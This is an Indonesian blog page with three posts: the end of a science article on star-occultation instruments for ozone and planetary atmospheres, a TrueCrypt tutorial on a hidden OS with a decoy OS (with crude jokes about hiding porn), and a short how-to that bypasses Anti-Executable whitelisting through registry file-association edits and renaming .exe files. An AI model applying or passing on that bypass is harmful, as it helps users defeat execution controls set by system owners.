Para ahli menggunakan instrumen yang bernama GOMOS (Global Ozone Monitoring by Occultation of Star), atau Pemantauan ozon secara Global dengan Teknik Okultasi Bintang yang dipasangkan di atas sateliti Envisat.

Terlalu dini untuk menilai bahwa ozon telah kembali ke keadaan semula, sebab data yang terkumpul dari instrumen juga menemukan fenomena lain yang berkontribusi terhadap jumlah ozon di atmosfir.

Pada bulan Januari dan Pebruari 2004, GOMOS melihat akumulasi Nitrogen dioksida pada ketinggian 65 km. Nitrogen dioksida adalah gas yang penting untuk dilacak keberadaannya di atmosfir bumi sebab dia bisa merusak ozon.

Dalam dua bulan berikutnya lapisan gas ini menyusut sampai 45 kilometer, jelaslah dia telah membinasakan ozon tapi selama menurun ia memberikan teka-teki lainnya bagi para peneliti.

Di pihak lain, sebuah instrumen okultasi bintang diinstalasi dalam satelit MarsExpress. Sejak kendaraan ruang angkasa datang di Planet Merah pada tahun 2003, SPICAM (Spectroscopy for Inverstogation of Characteristics of Athmosphere of Mars). atau Spektroskopi untuk menyelidiki karakteristik atmosfir Mars, dan sejauh ini telah mengamati lebih dari 1000 okultasi bintang.

Pekerjaan ini menyediakan deskripsi yang lebih rinci dari atmosfir Mars bagian atas dan membuka tabir misteri dari lapisan, terlepas dari pertimbangan ilmu sains dasar untuk misi eksplorasi yang akan datang. Profil atmosfir Mars penting untuk merancang payung (parachute) untuk keperluan pendaratan.

Perkembangan terbaru dari instrumen okultasi ini ialah SPICAV (Spectroscopy for Investigation of Characteristics of Athmosphere of Venus) atau Spektroskopi untuk Menyelidiki Karakteristik Planet Venus pada kendaraan ruang angkasa Venus Express.

Terdapat perbedaan karakteristik antara bumi, Mars dan Venus. Atmosfir di planet ini, jauh lebih pekat dan SPICAV mengungkapkan profil temperatur dan kepadatan dari atmosfir yang sudah ditunggu peneliti bumi untuk menerbitkan makalah penelitiannya.

Demikian salah satu kemanfaatan peralihan siang ke malam. Ini juga masih sangat jauh kurang dahsyat dibandingkan dengan dari terciptanya alam semesta.
Baca Selengkapnya... Misteri Peralihan Siang & Malam

01 November 2010

Cara Mengenkripsi dan Menyembunyikan Sistem Operasi Anda dari Prying Eyes



Ada banyak cara untuk memproteksi sistem operasi dan seluruh data dari teman atau orang lain yang ingin mengambil data anda. tetapi jika anda benar-benar serius untuk melindungi data anda, anda sebenarnya dapat menyembunyikan seluruh sistem operasi. Berikut persis bagaimana untuk melakukannya.

Untuk menyelesaikan tugas ini, kita akan menggunakan TrueCrypt , favorit kami-source disk enkripsi perangkat lunak bebas terbuka dan yang berjalan pada semua platform, mendukung tersembunyi volume, dan bahkan dapat mengenkripsi seluruh hard drive


Setelah selesai melakukan setup, Anda akan memiliki dua instalasi Windows dan dua password. Satu password akan mengaktifkan instalasi Windows tersembunyi sebagai sistem operasi yang nyata anda, dan yang lainnya, sebuah umpan install untuk membuang penyusup dari informasi data anda.

Menyiapkan Sistem Operasi Tersembunyi
Dalam rangka untuk benar-benar mengaktifkan fitur sistem operasi tersembunyi, Anda harus memastikan bahwa harddisk anda dipartisi dengan cara yang sangat khusus : Anda akan memerlukan dua partisi pada drive anda, dan partisi pertama untuk menginstal Windows Anda di atasnya. Partisi kedua harus lebih besar dari yang pertama, dan jika Anda menggunakan NTFS sebagai sistem file anda, maka perlu setidaknya 2,1 kali lebih besar dari partisi yang pertama. (Seperti menguliti kucing :p , ada banyak cara untuk partisi hard drive Windows 7 dan Vista telah di buat di alat partisi [buka Manajemen Komputer, kemudian pergi ke Storage -> Disk Management pada sidebar]., Atau Anda bisa memeriksa buku panduan untuk dual boot Windows 7 sebagai bahan belajar yang solid untuk memulai dengan sistem dipartisi.)


Setelah Anda punya instalasi Windows Anda dan berjalan, pastikan Anda telah mendownload dan menginstall TrueCrypt pada komputer anda. Kemudian klik System -> Create Hidden Operating System menu item.


Selanjutnya akan muncul sebuah wizard yang akan membantu menciptakan volume TrueCrypt baru ke dalam sistem operasi tersembunyi anda, yang akan hidup dalam volume tersembunyi pada partisi sekunder. Pilih Single-boot



Anda perlu untuk memilih metode enkripsi yang sama di seluruh papan saat Anda sedang berjalan melalui proses ini. Anda akan diminta beberapa kali untuk memilih enkripsi, dan Anda harus selalu memilih yang sama atau berbeda Anda tidak bisa boot atau mengakses data Anda-juga, pengaturan standar enkripsi AES jauh lebih cepat dari pada pilihan lain.


Anda akan diminta untuk memilih outer volume password, yang akan di buat untuk memproteksi Sistem Operas tersembunyi anda. Pastikan Anda tidak lupa dengan password ini. :p


Berikutnya akan akan muncul sebuah pertanyaan "apakah Anda ingin menyimpan file besar pada TrueCrypt volume". Pilihan ini terserah Anda, tapi untuk menghindari kemungkinan lain sebaiknya anda memilih "yes" pada pilihan ini.


Setelah volume partisi bayangan Anda di buat, Anda akan diminta untuk meletakkan beberapa file pada partisi itu  untuk memastikan partisi tersebut terlihat seperti sebuah drive nyata dalam hal ini Anda harus membuka partisi TrueCrypt.


Berikutnya Anda akan diminta untuk membuat password untuk volume tersembunyi, yang akan berisi sistem operasi tersembunyi. Ini sangat penting dan Anda harus memilih sebuah password yang berbeda, pastikan password sangat sulit di tebak (kalo perlu encrypt lg passwordnya :)) :)) ) dan pastikan Anda tidak lupa dengan password tadi :D


Selanjutnya Anda akan diminta untuk reboot(restart) PC Anda dan masukkan kembali kata sandi untuk sistem operasi tersembunyi. OS baru Anda tersembunyi akan disalin dari sistem operasi utama Anda dan di encryptsi.

Sekedar informasi untuk membuat partisi ini sangat lama dan bisa semalaman :)) :))
Tapi itulah sebuah harga yang harus di bayar untuk keamanan data Anda :D


Setelah sistem operasi tersembunyi telah dibuat, Anda akan dapat boot langsung ke dalamnya dengan menggunakan password yang tersembunyi, dan kemudian Anda akan diminta untuk menghapus sistem yang asli dari partisi pertama. Proses ini juga dapat memakan waktu beberapa jam, jadi anda bisa keluar jalan-jalan ke Mall sambil kecengin cewek trus balik lagi deh ke depan kompi jiakakakkakaakkkkkkk =)) =))


Pada tahap ini Anda akan memiliki sistem operasi tersembunyi, dapat diakses dengan menggunakan password yang tersembunyi. Sandi volume luar tidak akan berpengaruh apapun dengan menekan Esc pada layar boot loader TrueCrypt anda akan di bawa ke halaman mengatakan bahwa tidak ada sistem operasi bootable.

Ketika anda boot ke sistem operasi tersembunyi Anda, Anda akan melihat bahwa Anda masih mempunya dua drive, dan C: drive tampaknya sama seperti yang sebelumnya, namun sebenarnya itu adalah  volume terenkripsi, yang pada drive kedua Anda tidak dapat mengakses. Apapun yang anda lakukan, jangan pernah membuka drive ke dua atau memformatnya (kalau anda lupa :p)


Instal OS bayangan
Untuk menciptakan sistem operasi tersembunyi tidak terlalu berguna kecuali anda juga memiliki OS bayangan untuk mengelabui seseorang yang mungkin melihat PC anda dan mereka hanya akan menganggap bahwa anda menggunakan TrueCrypt untuk mengenkripsi drive anda.

Hanya drop disk instalasi Windows ke dalam drive anda, dan menginstal salinan baru-tapi membuat teman anda benar-benar yakin bahwa Anda menginstall-nya pada partisi pertama pada drive dan tidak di atas OS anda yang dienkripsi.


Setelah Anda menginstal Windows lagi, boot loader TrueCrypt akan dilenyapkan, tapi jangan khawatir, Anda hanya perlu men-download dan menginstal TrueCrypt di dalam sistem operasi umpan, dan kemudian menggunakan System -> Encrypt System Partition/Drive untuk mengenkripsi OS bayangan juga. Selama proses ini, Anda akan diminta untuk memilih password untuk sistem operasi bayangan, dan saya harap anda juga tidak lupa dengan password OS bayangan ini :D


Pastikan kali ini bahwa Anda memilih pilihan Normal pada wizard, dan ketika diminta, pilih versi enkripsi yang sama seperti yang Anda lakukan sebelumnya.


Pilih untuk mengenkripsi hanya partisi sistem Windows (lihat gambar di bawah), yang dalam hal ini adalah partisi pertama pada drive yang sistem operasi bayangan. Jika Anda memilih untuk mengenkripsi seluruh drive pada pilihan ini, itu akan merusak sistem operasi tersembunyi Anda.


Berikut adalah layar satu di wizard yang mungkin membuat anda untuk melakukan loop : anda diminta untuk membuat rescue disk dan membakarnya ke CD atau DVD menggunakan wizard TrueCrypt's. Meskipun anda benar-benar harus membuat rescue disk, jika anda mengalami masalah terbakar itu dari PC ini tertentu dan memutuskan untuk membakar disk dengan menggunakan PC lain sebagai gantinya, anda dapat menyimpan ISO image ke hard drive anda dan kemudian menggunakan perangkat lunak ISO mounting untuk mount disk. Hal lain, Anda bisa melanjutkan melalui wizard disket penolong yang ada di drive anda.


Setelah wizard selesai, Anda harus menunggu sementara drive dienkripsi, yang akan memakan waktu beberapa jam lagi. Setelah itu selesai, anda akan memiliki sistem operasi yang tersembunyi, dan OS Bayangan untuk mengelabui orang lain.

Menggunakan OS Bayangan atau Sistem Operasi Tersembunyi
Ketika Anda reboot komputer Anda, Anda akan melihat layar boot loader TrueCrypt, di mana Anda dapat mengetik dalam salah satu dari dua password. Jika Anda menggunakan password OS tersembunyi, Anda akan mengakses OS tersembunyi Anda , dan jika Anda menggunakan password yang OS Bayangan, otomatis, Anda akan mengakses sistem operasi Bayangan.


Jika anda telah boot ke dalam sistem operasi bayangan, Anda dapat mengakses volume partisi yang terenkripsi untuk "membuktikan" kepada teman anda bahwa drive tersebut hanya menggunakan TrueCrypt untuk memproteksi partisi itu. ketika Anda me-mount volume dengan menggunakan TrueCrypt, anda hanya akan memamerkan contoh file yg ada pada partisi tersebut.


Finally, Anda sudah punya sistem operasi yang benar-benar terenkripsi dan benar-benar tersembunyi. Untuk melakukan hal ini membutuhkan waktu yang lama dan sangat menyita waktu luang anda seperti cuci mata, nonton bokep, atau ke SarKem cuman untuk sekedar absen saja.............buakakakkakakakkkkkkkkk
tapi hal itu semua tidak sebanding dengan kerahasiaan data dan file-file penting anda (file perusahaan) termasuk di dalam nya film porno dan gambar bokep, nomor handphone + alamat selingkuhan anda wkwkkwkwkwkwkkwkwwkkk =)) =))

Baca Selengkapnya... Cara Mengenkripsi dan Menyembunyikan Sistem Operasi Anda dari Prying Eyes

26 October 2010

Cara Menjebol Anti Executable ^_^

Tutor ini gue dapat setelah lama gw mikir gimana caranya nih software Anti Executable d jebol. Sebelumnya ane dah baca tutor dari teman dan sahabat yang membuat shorcut pada "map drive" dan menjalan kan aplikasinya dari map drive tersebut... tp gw pikir repot juga yah kalo harus keluar masuk map drive....

Ok langsung ajah :p

terlebih dahulu siapin
1. Rokok (Merek apa ajah PUSAKA juga boleh tergantung selera) wakakakakka :)):))
2. Mod
3. Aplikasi yang ingin d jalankan ^_^


Ok Let's begin

1. Masuk ke Run, ketik regedit

2. Masuk ke HKCR (HKEY_CLASSES_ROOT)

3. Buat Key baru dengan nama .habs (Wajib!!)

4. Trus di String Defaultnya, klik 2x dan isi "habsfile" (tanpa tanda kutip)

5. Sekarang buat key baru lagi di HKCR dengan nama habsfile

6. Didalam Key habsfile, buat key lagi namanya shell

7. Didalam Key shell, buat key lagi namanya open

8. Didalam Key open, buat key lagi namanya command

9. Didalam Key command, ubah string defaultnya dengan klik 2x dan isi "%1" %* (pake tanda petik) Trus tutup regeditnya.

10. Masuk ke Windows Explorer, Tools, Folder Options, View, Trus lepas centang di Hide extensions for known file types

11. Sekarang pilih file .exe yang mo ente ubah!

12. Rename extension .exe nya jadi .habs

13. Klik 2x di file yang extensionnya dah ente ubah!

(jebol anti exe)
==================================================

Sekian dan terima kasih

Sepecial Thank's to "sangkala.baso"

NB*  Artikel ini hanya berlaku di versi 3.0 dan sebelumnya :)
Baca Selengkapnya... Cara Menjebol Anti Executable ^_^